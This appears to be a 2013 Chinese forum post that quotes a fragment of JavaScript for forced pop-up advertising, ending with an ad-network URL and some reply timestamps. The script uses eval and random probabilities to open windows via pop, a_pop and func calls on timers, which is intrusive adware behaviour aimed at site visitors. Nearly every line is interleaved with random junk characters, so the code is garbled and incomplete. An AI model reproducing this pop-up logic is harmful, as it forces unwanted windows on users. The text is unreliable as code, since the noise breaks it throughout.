5 V% I* f+ ?+ O4 X; F+ M. a9 e* s, z - a: 1, , \ w. m" G, C8 `! V
- b: 2
7 p* X2 A0 b) e) v - }) 3 Q6 O( o& ^# c9 l4 Y: n
- }, , b: H/ m8 l* r! z
- 300) + d- q" d! x% ?5 o% n' r+ N
- } % e4 k8 J' f, A% ^
- for (var i = 1; i <= 10; i++) { . \, [" T+ B: L T5 W
- var n = i == 1 ? "": i;
0 _/ r; D7 N* g: ]6 L: Z8 x - if (eval("_pt" + n + "b") > Math.random()) { 4 h: s' Z- b$ v
- setTimeout(function() {
9 S/ ?- ?) [6 \+ W - setTimeout(function() { J% e3 f7 o# W' u
- pop(url, { ! M! G) r; v" C- i
- a: 1, * j" b; A. s2 k m+ D
- b: 2 7 F t2 d/ ?/ O
- }) $ @' x$ G' d3 ]0 @1 h8 z- j. q
- }, 0 r% f5 t; s( A0 q6 h
- 300) $ V7 ]( x. Y/ k& E! |
- },
! ^6 @0 R( p- p7 j - parseInt(eval("_pt" + n + "a")) * 1000)
) R8 h0 M) G* U8 Y - } ; j. S+ x+ s3 o4 R' g4 g+ q* {8 u
- }
$ _3 A& B2 m! M* K - if (_pc2 > Math.random()) { - U& ~/ g! `1 M* k/ h$ \: u8 b
- a_pop(url) * X B$ W7 c+ d" a9 x |) B
- } / E7 F( v; B. ^% Q5 }
- if (_po > Math.random()) {
7 u9 @* m% m7 u2 c5 @ - try {
% R6 y6 a5 V, E - func(url)
; Z$ z# E2 h) E3 r, ?3 v - } catch(q) {} 6 b+ T: X0 L& u0 e2 ]
- } $ [) q# z7 F& L, A5 L
- } , Z" S8 S3 o( h2 y
- }; 6 P4 i$ ~1 Q6 M, J; R
- fstart(aa_url); 5 F/ ~* {/ u1 M" N$ p: k
- event(window, 'beforeunload', * }, Z" L/ `) h
- function() {}) 7 m9 z: g7 |1 I- N
- })();
! N" |4 J# W; Y% }: g; D0 p- OURL从这里产生0 a/ d& }$ ^' L7 [, ^. D
) @2 m( k% B* X- a" K) F8 ihttp://play.unionsky.cn/show/?placeid=1418304 l, j3 W& k. p' |% U; i9 A
: j, o+ y1 e6 N8 w/ K) {: E: `# C% K
3 ~' `' J7 \6 }# { |
发表于 2013-12-17 15:03:03
楼主
D:1
发表于 2013-12-17 15:31:30
发表于 2013-12-17 16:34:22
发表于 2013-12-17 19:34:38
